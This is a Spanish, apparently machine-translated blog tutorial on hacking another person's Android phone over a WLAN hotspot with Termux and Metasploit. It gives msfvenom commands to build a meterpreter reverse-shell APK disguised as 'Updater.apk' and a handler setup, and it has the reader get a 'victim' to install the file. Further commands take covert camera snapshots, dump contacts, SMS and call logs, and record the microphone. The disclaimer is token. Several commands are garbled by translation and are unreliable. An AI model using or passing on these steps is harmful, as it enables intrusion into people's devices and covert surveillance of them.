BlogWonderHowTo

Cómo: HACKEAR un dispositivo Android con TermuX en Android | Parte # 2 – Sobre el punto de acceso WLAN [Ultimate Guide]

Hola mi compañero H4ck3Rs

  • Quiero hacer algo PERROS GUARDIANES estilo H4cK1nG … !!! (A través de su punto de acceso WLAN), ¡entonces está en el lugar correcto! , pero esta vez, no estamos HACKING en Internet. Pero vamos a hacer HACKING a través de la red WLAN.
  • Puedes decirlo como: “Hackeo de Android a Android“. Este método funciona al 100%, así que sigue mi tutorial con cuidado, es realmente muy fácil de seguir. Si tienes algún error o crees que me he perdido algo, infórmame en la sección de Comentarios. Haré todo lo posible para solucionarlo. el problema.
  • Una restricción: Metasploit no funciona en rangos largos (solo para WLAN Hotspot), por ejemplo, si la distancia del dispositivo Android de su víctima (cuyo wifi está conectado a su WLAN Hotspot) es superior a 10 m del suyo, entonces no estará capaz de HACKEAR ese dispositivo! Para evitar esta situación, use mi Tutorial de la Parte # 1, porque es muy confiable.
  • DESCARGO DE RESPONSABILIDAD: Este hilo es ÚNICAMENTE para fines educativos. No seré responsable de ningún uso ilegal o negativo de esta información. Trate de no HACKER a los Androides, que no sean los suyos. O estarás en PRISIÓN. Utilice esta información únicamente con fines de prueba o para impresionar a sus amigos.

Entonces empecemos…

Requisitos

1). Android 5.0 (o posterior)

2). Aplicación TermuX para Android (descárguela de Tienda de juegos

3). Metasploit Framework instalado en TermuX (Mi tutorial aquí)

4). Punto de acceso WLAN activo

5). Se debe permitir que TermuX use almacenamiento externo (para esto, solo ingrese este comando a la vez: “termux-setup-storage”)

6). MiXplorer (para firmar el archivo APK, descárguelo de Sitio web UpToDown)

7). MiX Signer (APK Signer para MiXplorer, descárguelo de Tienda de juegos)

8). (Uso recomendado Teclado de hacker para ingresar comandos en TermuX fácilmente.

Paso 1: ¿Qué IP debería usarse …?

  • En primer lugar, encienda su punto de acceso WiFi (punto de acceso WLAN).
  • Conecte el dispositivo Android de su víctima.
  • Ahora, debe abrir TermuX y anotar su IP (como servidor). Para esto, abra TermuX e ingrese:

ifconfig

  • Ahora, aquí puede ver la dirección IP de su punto de acceso permanente (como servidor), en ap0 campo, así (aquí mi IP permanente como servidor es 192.168.43.1):
  • Anote la dirección IP de su punto de acceso permanente para usarla más adelante.

Paso 2: Creación de un archivo APK con carga útil incorporada

  • Para crear un archivo APK con carga útil incorporada, ingrese este comando en TermuX:

msfvenom -p android / meterpreter / reverse_tcp LHOST = 192.168.43.1 LPORT = 4444 R
> almacenamiento / descargas / Updater.apk

  • Muy bien … Ahora el archivo APK con carga útil integrada se genera con éxito aquí: Almacenamiento de teléfono / tarjeta SD -> descargas -> Updater.apk
  • (OPCIONAL) Puede utilizar Editor de APK Pro , para cambiar el nombre (predeterminado: MainActivity) y la versión del archivo APK generado.

Paso 3: firma del archivo APK recién generado

Para firmar el archivo APK recién generado,

  • Abierto Administrador de archivos MiXplorer y dirígete a “Archivo APK sin firmar (Updater.apk)“(se ubicará en la carpeta de descargas).
  • Pulsación larga en “Archivo APK sin firmar (Updater.apk)“y seleccione”Botón de menú“en la esquina superior derecha de MiXplorer, luego seleccione”SEÑAL“.
  • Mostrará una variedad de opciones para firmar el archivo APK (pero se prefiere “AUTO”).
  • Seleccione “AUTO“para firmar automáticamente y con éxito el archivo APK.
  • Ahora, su archivo APK: (nombre de archivo) -signed.apk está firmado con éxito y es completamente funcional también es de 9,9 KB de tamaño.

Paso 4: Configurar Metasploit en TermuX

  • Active Metasploit Framework en TermuX ingresando este comando en una nueva sesión:

msfconsole

Nota (1): – Si aún no ha instalado Metasploit-Framework en su aplicación TermuX, siga este tutorial: Instale Metasploit Framework en TermuX en Android | H4ck3R_777

Nota (2): – Si recibe este error: No se pudo conectar a la base de datos, como se muestra en la captura de pantalla anterior, ingrese los siguientes comandos en NUEVA SESIÓN (Desafortunadamente, es posible que deba ingresar estos comandos cada vez que abra TermuX (en una sesión separada). Pero afortunadamente no ingresar tales (siguientes) comandos, ¡no afectará su Hacking! Por eso, estoy ignorando este error):

mkdir -p $ PREFIX / var / lib / postgresql
initdb $ PREFIX / var / lib / postgresql
pg_ctl -D $ PREFIX / var / lib / postgresql start

– ¡¡¡Gracias a DUST WORLD, por esta solución … !!!
  • Ahora, cuando se inicie msfconsole, escriba los siguientes comandos (en negrita) uno por uno con cuidado:

msf> usar exploit / multi / handler
msf> establecer carga útil android / meterpreter / reverse_tcp
msf> establecer LHOST 192.168.43.1
msf> establecer LPORT 4444
msf> explotar -j -z

– Ingrese solo comandos EN NEGRITA

Paso 5: Instalar APK en el dispositivo Android de la víctima

  • Ahora, envíe el archivo Updater-Signed.apk al dispositivo Android de su víctima (por ejemplo, se recomienda a través de Bluetooth) -> Instálelo -> luego ábralo (asegúrese de que el dispositivo de la víctima tenga una conexión WiFi exitosa con su WLAN Hotspot).
  • Después de abrir el archivo APK en el teléfono de la víctima, verá que se activará la Sesión de Meterpreter en su campo Metasploit.
  • Para abrir la sesión de Meterpreter del dispositivo de su víctima, haga clic en “Botón de retorno“(si es necesario) e ingrese este comando en la sesión de Metasploit:

sesiones -i (ID de sesión)

– (ID de sesión) = 1, 2, 3, 4 o 5 …
  • En (ID de sesión) , seleccione el número de sesión de Meterpreter (es decir, verá este mensaje cuando su víctima abra el archivo APK: Sesión Meterpreter Apertura 1 , aquí , 1 es el ID de sesión de Meterpreter Session). Mira la captura de pantalla a continuación.
  • Si ve la siguiente ventana, entonces
  • BINGO…….!!!!!!!! Has pirateado con éxito el dispositivo Android de tu víctima

!!! … ¿Necesitas ayuda para hackear … ???

Puede ingresar: {meterpreter> ayuda} comando, para todos los comandos disponibles, aquí, he simplificado algunos comandos para el uso de TermuX.

  • Tomando instantáneas sigilosas desde la cámara frontal

Simplemente ingrese este comando para esto:

webcam_snap -i 2 -p almacenamiento / descargas / X-Stealth-Snapshot-F.jpg

Aquí, en este comando, 2 representa la cámara frontal. Para la cámara trasera, usaremos 1.

Su instantánea de Stealth se puede encontrar aquí: (Almacenamiento de escritura predeterminado) -> descargas -> X-Stealth-Snapshot-F.jpg

  • Tomando instantáneas sigilosas desde la cámara trasera

Al igual que el anterior, pero esta vez usaremos 1,

webcam_snap -i 1 -p almacenamiento / descargas / X-Stealth-Snapshot-R.jpg

Su instantánea de Stealth se puede encontrar aquí: (Almacenamiento de escritura predeterminado) -> descargas -> X-Stealth-Snapshot-R.jpg

Para buscar contactos, simplemente ingrese este comando:

dump_contacts -o almacenamiento / descargas / X-Contacts.txt

Los contactos se guardarán en: (Almacenamiento de escritura predeterminado) -> descargas -> X-Contacts.txt

Como arriba

dump_sms -o almacenamiento / descargas / X-SMS.txt

Todos los SMS se guardarán en: (Almacenamiento de escritura predeterminado) -> descargas -> X-SMS.txt

Solo ingrese esto:

dump_calllog -o almacenamiento / descargas / X-CallLog.txt

El registro de llamadas se guardará en: (Almacenamiento de escritura predeterminado) -> descargas -> X-CallLog.txt

  • Espiar a través del micrófono

Aquí, debe editar la duración del micrófono de grabación (predeterminado: 1 s). El comando para la grabación de 10 segundos es este:

record_mic -d 10 -f almacenamiento / descargas / X-Spy-Record.mp3

La grabación espía se guardará en: (Almacenamiento de escritura predeterminado) -> descargas -> X-Spy-Record.mp3

  • Salir de la sesión de Meterpreter

Solo entra Salida para cerrar la sesión actual de Meterpreter. Ingrese nuevamente para salir de Metasploit.

???…Problemas comunes…???

  • Metasploit no se ejecuta en TermuX

Esto podría suceder si hace algo mal al instalar TermuX en Android. Si ve un error como GEMS no encontrado, o cualquier error de este tipo, simplemente elimine TermuX con sus datos y vuelva a instalarlo.

  • msfvenom / msfconsole: comando no encontrado!

Hay dos posibles razones para ese error.

1). Metasploit no está instalado correctamente en TermuX. Por eso, no pudo crear un acceso directo de comando. Para solucionar este problema, desinstale TermuX, con Data. Luego reinstale TermuX y repita todo el método nuevamente. En realidad, se trata de un error de secuencia de comandos. ¡También enfrenté este problema la primera vez que instalé Metasploit en TermuX!

2). Metasploit se instaló correctamente, pero no pudo crear el acceso directo. Para administrar esto, solo ingrese:

cd metasploit-framework

luego, ingrese el comando msfvenom con ./ al inicio. es decir

./msfvenom -p ……

  • ¿Por qué usamos MiXplorer para firmar el archivo APK …?

En realidad, no hay otra forma de firmar el archivo APK en Android. De lo contrario, debe firmar el archivo de la aplicación en su PC (especialmente en Kali LinuX). MiXplorer es la excelente manera de firmar el archivo APK, directamente en Android.

  • Error de Metasploit: no se pudo conectar a la base de datos

No te preocupes por eso. Ya hemos creado una solución para esto :). Creo que se ha dado cuenta antes, que estaba usando “localhost”, en lugar de 127.0.0.1 o ::: 0: 1, como HOST. En realidad, el comando “localhost” lo conecta automáticamente con el host local disponible, sin importar si es 127.0.0.1 o ::: 0.1, etc.

Pero si aún desea solucionarlo, ingrese los siguientes comandos en Nueva sesión de TermuX con cuidado:

mkdir -p $ PREFIX / var / lib / postgresql
initdb $ PREFIX / var / lib / postgresql
pg_ctl -D $ PREFIX / var / lib / postgresql start

– ¡¡¡Gracias a DUSTY WORLD, por este FIX … !!!
  • ¿Qué teléfono Android es mejor para los propósitos de H4ck1nG …?

1). Los teléfonos / tabletas Google NexuS son excelentes para propósitos de piratería informática. Como, son completamente compatibles con Kali NetHunter. NetHunter incluye todas las herramientas de piratería y funciona como Android / Windows en una tableta.

2). Pero si hablamos de Android, muchos H4ck3R dicen que Samsung Galaxy S5 es excelente para propósitos de Ha4ck1nG. Tiene una buena versión de Android, también es completamente compatible con TermuX.

Nota:-

Esta información es sólo con fines educativos. No seré responsable de ningún uso negativo o ilegal de esta información. Además, si te enfrentas a algún tipo de error, o crees que me he perdido algo, dímelo en la sección de comentarios. Encontraré la solución adecuada para eso. De todos modos, solo usa estos trucos para DIVERTIRTE … no para hacer trabajo ilegal. Todos somos H4ck3R éticos y nunca invadimos la privacidad de las personas.

De todos modos, gracias por leer mi hilo (también puedes unirte a nuestro Grupo de WhatsApp para obtener más información y guías). LA MEJOR DE LAS SUERTES …!!!

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba
Cerrar